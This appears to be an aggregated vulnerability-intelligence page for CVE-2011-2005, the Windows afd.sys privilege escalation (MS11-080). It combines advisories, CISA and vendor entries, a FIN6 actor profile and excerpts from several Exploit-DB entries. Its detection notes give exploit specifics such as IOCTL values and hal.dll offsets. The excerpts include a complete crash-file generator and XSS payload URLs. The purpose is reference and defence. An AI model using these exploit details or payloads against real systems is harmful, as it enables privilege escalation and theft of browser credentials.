CVE-2011-2005
Published 2011-10-12
CVE-2011-2005: afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel…
Priority: P278 · high · 7.8 (CVSS 3.1)
Vector: AV:L / AC:L / PR:N / UI:R / S:U / C:H / I:H / A:H
Flags: KEV · ITW · Exploit
CISA Known Exploited Vulnerability, remediation due 2022-04-18
Exploited in the wild
EPSS: 31.76% (98.1th percentile)
afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability."
Detection & IOCs (extracted from sources)
- (other) ZwDeviceIoControlFile / NtDeviceIoControlFile with IOCTL 0x000120bb, inputbuffer 0x1004, inputbuffer_size 0x108, outputbuffer HalDispatchTable+0x4+1, outputbuffer_size 0x0
- (bytes) irpstuff: 41414141 42424242 00000000 44444444 01000000 e800 34 f000 45*231
- Monitor for NtQueryIntervalProfile calls with input value 0x1337 immediately following a DeviceIoControl to afd.sys; this is the trigger step to execute the kernel shellcode after the HalDispatchTable overwrite.
- Alert on WSASocket creating a TCP socket that is immediately connected to 127.0.0.1:4455 (a closed port) to obtain a CONNECTING-state socket handle for use in the malicious DeviceIoControl call.
- The FIN6 threat actor has weaponized CVE-2011-2005 for local privilege escalation to kernel-level privileges; correlate afd.sys exploitation indicators with FIN6 TTPs such as Cobalt Strike, Mimikatz, and FrameworkPOS activity.
- The exploit targets 32-bit Windows XP SP3 and Windows Server 2003 SP2 exclusively; flag execution of exploit code on these OS versions with the specific hal.dll offsets HaliQuerySystemInformation (XP: +0x16bba, 2K3: +0x1fa1e) and HalpSetSystemInformation (XP: +0x19436, 2K3: +0x21c60).
- The standalone Python exploit (EDB-18176) requires the attacker to specify the target OS (-O XP or -O 2K3), as the hal.dll offsets differ between Windows XP SP3 and Windows Server 2003 SP2; incorrect targeting will fail or crash the system.
- The exploit is limited to 32-bit (x86) systems only; the Metasploit module explicitly rejects WOW64 and 64-bit targets.
- The exploit requires a local (non-SYSTEM) session; the Metasploit module aborts if the session is already running as SYSTEM.
- Post-exploitation token restoration is critical for system stability; skipping the restore step after shellcode execution risks system instability or a BSOD.
CVSS provenance
NVD (CVSS v3.1): 7.8 HIGH, CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
NVD (CVSS v2.0): 7.2 HIGH, AV:L/AC:L/Au:N/C:C/I:C/A:C
VulnCheck: 7.8 HIGH
CISA: 7.8 HIGH
Red Hat (vendor): 7.5 HIGH
CISA
Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
cisa·2022-03-28·CVSS 7.8
CVE-2011-2005 [HIGH] CWE-264 Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
Vulnerability: Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
Affected: Microsoft Ancillary Function Driver (afd.sys)
afd.sys in the Ancillary Function Driver in Microsoft Windows does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2011-2005
Remediation Due Date: 2022-04-18
Red Hat
squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
vendor_redhat·2011-08-28·CVSS 5.0
CVE-2011-3205 [MEDIUM] squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
Buffer overflow in the gopherToHTML function in gopher.cc in the Gopher reply parser in Squid 3.0 before 3.0.STABLE26, 3.1 before 3.1.15, and 3.2 before 3.2.0.11 allows remote Gopher servers to cause a denial of service (memory corruption and daemon restart) or possibly have unspecified other impact via a long line in a response. NOTE: This issue exists because of a CVE-2005-0094 regression.
Package: squid (Red Hat Enterprise Linux 4) - Not affected
Package: squid (Red Hat Enterprise Linux 5) - Not affected
Red Hat
php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
vendor_redhat·2010-12-08·CVSS 7.5
CVE-2011-0752 [HIGH] php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
The extract function in PHP before 5.2.15 does not prevent use of the EXTR_OVERWRITE parameter to overwrite (1) the GLOBALS superglobal array and (2) the this variable, which allows context-dependent attackers to bypass intended access restrictions by modifying data structures that were not intended to depend on external input, a related issue to CVE-2005-2691 and CVE-2006-3758.
Statement: We do not consider this flaw to be a security issue as it is only exploitable by the script author. No trust boundary is crossed.
This issue did not affect the versions of PHP as shipped with Red Hat Enterprise Linux 3, 4, or 5 (php). This issue was addressed in the php53 packages as shipped in Red Hat Enterprise Linux 5 before t
GHSA
GHSA-8q8w-v8pg-496j: afd
ghsa_unreviewed·2022-05-14
CVE-2011-2005 [HIGH] GHSA-8q8w-v8pg-496j: afd
afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability."
VulnCheck
Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
vulncheck·2011·CVSS 7.8
CVE-2011-2005 [HIGH] CWE-264 Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
afd.sys in the Ancillary Function Driver in Microsoft Windows does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application.
Affected: Microsoft Ancillary Function Driver (afd.sys)
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Exploit PoC: https://vulncheck.com/xdb/f986d5f654bf
Remediation Due: 2022-04-18
No detection rules found.
Exploit-DB
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)
exploitdb·2012-10-10
CVE-2011-2005 Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
class Metasploit3 'MS11-080 AfdJoinLeaf Privilege Escalation',
'Description' => %q{
This module exploits a flaw in the AfdJoinLeaf function of the
afd.sys driver to overwrite data in kernel space. An address
within the HalDispatchTable is overwritten and when triggered
with a call to NtQueryIntervalProfile will execute shellcode.
This module will elevate itself to SY
Exploit-DB
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
exploitdb·2011-11-30·CVSS 7.8
CVE-2011-2005 [HIGH] Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
---
################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: [email protected] - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng
Exploit-DB
Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
exploitdb·2011-11-30
CVE-2011-5173 Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
---
#Exploit Title: FlatOut Malformed .bed file Buffer Overflow
# Date: 11-29-11
# Author: Silent Dream
# Software Link: http://www.gog.com/en/gamecard/flatout
# Version: Latest
# Tested on: Windows 7
#Tested on GOG.com copy of FlatOut. Exception offset = 61616161
#Multiple .bed files are vulnerable to buffer overflows...too many to even begin to list..
my $file = "playlist_0.bed";
my $head = "Title = \"";
my $junk = "a" x 3000 . "\"\r";
my $tail = "Loop = {" . "\r}";
open($File, ">$file");
print $File $head.$junk.$tail;
close($File);
print "Overwrite the original playlist_0.bed file in %program files%\\GOG.com\\FlatOut\\data\\music and launch flatout.exe...wait for the crash\r\n";
Exploit-DB
Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2011-08-09
CVE-2011-1976 Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities
Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/49033/info
Microsoft Visual Studio is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to spoof content or disclose sensitive information.
https://www.example.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=%3CarbitraryIDvalue%3E&ControlID=%3CvalidControlID%3E&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00T
Exploit-DB
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
exploitdb·2011-07-08
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
---
#!/usr/bin/perl
#
#[+]Exploit Title: ZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit
#[+]Date: 08\07\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/ZipWiz-2005/3000-2250_4-10011590.html
#[+]Version: v5.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
use strict;
use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";
sleep(1);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $head2 = "\x50\x4B\x01\x02
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
exploitdb·2011-02-08
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Window
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
exploitdb·2011-01-24
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin.rb 11631 2011-01-24 19:37:58Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
and Microsoft Desktop
Exploit-DB
PAFaq - Question Cross-Site Scripting
exploitdb·2005-06-20
CVE-2005-2011 PAFaq - Question Cross-Site Scripting
PAFaq - Question Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/14001/info
paFaq is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Zscaler
Zscaler found Multiple Security Vulnerabilities | 11-11-2011
blogs_zscaler·CVSS 9.3
[CRITICAL] Zscaler found Multiple Security Vulnerabilities | 11-11-2011
Threat Intel
FIN6 (FIN6, Magecart Group 6, ITG08)
threat_intel
FIN6 (FIN6, Magecart Group 6, ITG08)
# Threat Actor Profile: FIN6
ATT&CK ID: G0037
Also known as: FIN6, Magecart Group 6, ITG08, Skeleton Spider, TAAL, Camouflage Tempest
## Overview
FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)
## Techniques (TTPs)
### Resource Development
- T1588.002 Tool
Usage: FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.(Citation: Security Intelligence More Eggs Aug 2019)(Citation: FireEye FIN6 Apr 2019)
### Initial Access
- T1566.001 Spearphishing Attachment
Usage: FIN6 has targeted victims with e-mails containing ma
Bugzilla
CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
bugzilla·2011-08-30·CVSS 5.0
CVE-2011-3205 [MEDIUM] CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
A flaw was reported [1] in how Squid parsed responses from Gopher servers. This flaw could result in a buffer overflow if a Gopher server were to return a line longer than 4096 bytes, leading to memory corruption and a crash. This flaw is an extension of SQUID-2005:1 (or CVE-2005-0094) in Squid 3.x, due to increased packet read sizes. A malicious user could set up a fake Gopher server and forward requests to it through Squid. A specially crafted response from that server could cause Squid to restart.
This has been corrected in upstream versions 3.2.0.11, 3.1.15, and 3.0.STABLE26. Patches for 3.0 [2], 3.1 [3], and 3.2 [4] are available.
[1] http://www.squid-cache.org/Advisories/SQUID-2011_3.txt
[2] htt
Bugzilla
CVE-2011-0284 krb5 (krb5kdc): Double-free flaw by handling error messages upon receiving certain AS_REQ's (MITKRB5-SA-2011-003)
bugzilla·2011-02-01·CVSS 5.0
CVE-2011-0284 [MEDIUM] CVE-2011-0284 krb5 (krb5kdc): Double-free flaw by handling error messages upon receiving certain AS_REQ's (MITKRB5-SA-2011-003)
CVE-2011-0284 krb5 (krb5kdc): Double-free flaw by handling error messages upon receiving certain AS_REQ's (MITKRB5-SA-2011-003)
A double-free flaw was found in the way the MIT Kerberos KDC handled initial authentication requests (AS-REQ), when the KDC was configured to provide the PKINIT capability. A remote attacker could use this flaw to cause the KDC daemon to abort by using a specially-crafted AS-REQ request. Different vulnerability than CVE-2010-1320 and CVE-2005-1174.
Discussion:
Created attachment 476397
Proposed patch from Nalin Dahyabhai to fix the issue
---
This issue did NOT affect the versions of the krb5 package, as shipped
with Red Hat Enterprise Linux 3, 4, or 5.
This issue affects the version of the krb5 package, as shipped
with Red Hat Enterprise Linux 6.
--
This i
Bugzilla
CVE-2011-0530 NBD: CVE-2005-3534 reintroduced in upstream nbd-v2.9.0 version
bugzilla·2011-01-28·CVSS 7.5
CVE-2011-0530 [HIGH] CVE-2011-0530 NBD: CVE-2005-3534 reintroduced in upstream nbd-v2.9.0 version
CVE-2011-0530 NBD: CVE-2005-3534 reintroduced in upstream nbd-v2.9.0 version
Originally, CVE-2005-3534:
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3534
has been assigned to NBD and addressed in nbd-v2.8.3 version:
[2] http://sourceforge.net/project/shownotes.php?release_id=380202&group_id=13229
via changeset:
[3] https://github.com/yoe/nbd/commit/4ed24fe0d64c7cc9963c57b52cad1555ad7c6b60
But nbd-v2.9.0:
[4] http://sourceforge.net/projects/nbd/files/nbd/2.9.0/
contains the issue again. This flaw was fixed a second time
via upstream changeset:
[5] https://github.com/yoe/nbd/commit/3ef52043861ab16352d49af89e048ba6339d6df8
References:
[6] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=611187
Discussion:
This issue affects the versions of the nbd package, as shipped
with
References:
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-080
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13114
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2011-2005
Timeline:
- 2011-10-12: Published
- 2022-03-28: Added to CISA KEV
- Exploited in the wild